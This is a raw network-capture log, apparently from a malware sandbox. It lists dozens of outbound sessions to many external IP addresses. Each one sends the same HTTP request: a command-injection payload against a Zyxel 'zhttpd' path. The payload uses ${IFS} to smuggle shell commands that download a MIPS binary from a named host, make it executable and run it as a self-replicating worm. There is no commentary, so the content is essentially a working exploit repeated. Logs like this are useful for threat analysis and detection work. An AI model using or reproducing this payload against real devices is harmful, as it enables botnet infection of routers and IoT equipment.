                                                        Jan 28, 2024 10:12:56.467828035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5240192.168.2.1436164176.71.253.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.467854023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5241192.168.2.143328082.22.125.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.467905045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5242192.168.2.1435230137.179.125.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.467956066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5243192.168.2.1457920111.153.243.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.467988014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5244192.168.2.145707294.39.4.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468044043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5245192.168.2.1434222170.103.48.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468086958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5246192.168.2.144514045.138.229.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468113899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5247192.168.2.145922069.234.180.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468137980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5248192.168.2.1453708102.12.158.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468169928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5249192.168.2.1456940176.18.232.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468240976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5250192.168.2.1442608190.14.8.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468264103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5251192.168.2.1441988183.226.215.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468298912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5252192.168.2.1457714199.139.203.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468336105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5253192.168.2.145745046.107.237.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468369961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5254192.168.2.1454562134.241.72.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468426943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5255192.168.2.1457300185.188.142.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468461037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5256192.168.2.1432818177.16.211.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468496084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5257192.168.2.144218834.44.50.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468522072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5258192.168.2.14560181.210.181.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468568087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5259192.168.2.1447124140.183.53.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468586922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5260192.168.2.1448302173.17.40.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468615055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5261192.168.2.1443624188.134.109.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468672991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5262192.168.2.1455874115.107.22.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468724966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5263192.168.2.1442314132.144.207.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468772888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5264192.168.2.1460292124.17.64.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468806028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5265192.168.2.1451908190.17.196.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468844891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5266192.168.2.1446072100.24.157.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468883038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5267192.168.2.143792654.211.133.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468930960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5268192.168.2.144591446.177.201.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.468975067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5269192.168.2.144356262.105.109.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469003916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5270192.168.2.1437498180.79.88.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469044924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5271192.168.2.143280817.177.37.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469093084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5272192.168.2.1450172141.168.180.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469120026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5273192.168.2.1439002223.14.194.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469185114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5274192.168.2.1447140168.36.104.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469223022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5275192.168.2.1443454187.7.193.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469264030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5276192.168.2.144259432.135.61.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469293118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5277192.168.2.1442702199.207.88.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469350100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5278192.168.2.1449004120.63.51.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469377995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5279192.168.2.144183694.151.144.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469405890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5280192.168.2.1435760119.9.184.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469455957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5281192.168.2.143428098.39.214.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469511032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5282192.168.2.1449754176.69.53.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469531059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5283192.168.2.143983892.110.198.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469582081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5284192.168.2.1445646133.92.173.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469607115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5285192.168.2.144044078.134.48.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469636917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5286192.168.2.1460708105.255.153.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469659090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5287192.168.2.1452486208.24.69.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469716072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5288192.168.2.1459356188.214.96.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469748974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5289192.168.2.143679031.144.33.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469805956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5290192.168.2.144613444.148.253.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469834089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5291192.168.2.143887489.182.74.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469871044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5292192.168.2.1460866160.241.152.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469922066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5293192.168.2.1455948157.106.57.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.469953060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5294192.168.2.144254827.82.80.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470001936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5295192.168.2.144547249.180.5.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470033884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5296192.168.2.145192882.210.121.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470067978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5297192.168.2.144180281.62.14.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470110893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5298192.168.2.144821496.147.157.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470141888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5299192.168.2.145371053.225.42.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.470187902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5300192.168.2.1444776105.106.114.147443
                                                        TimestampBytes transferredDirectionData
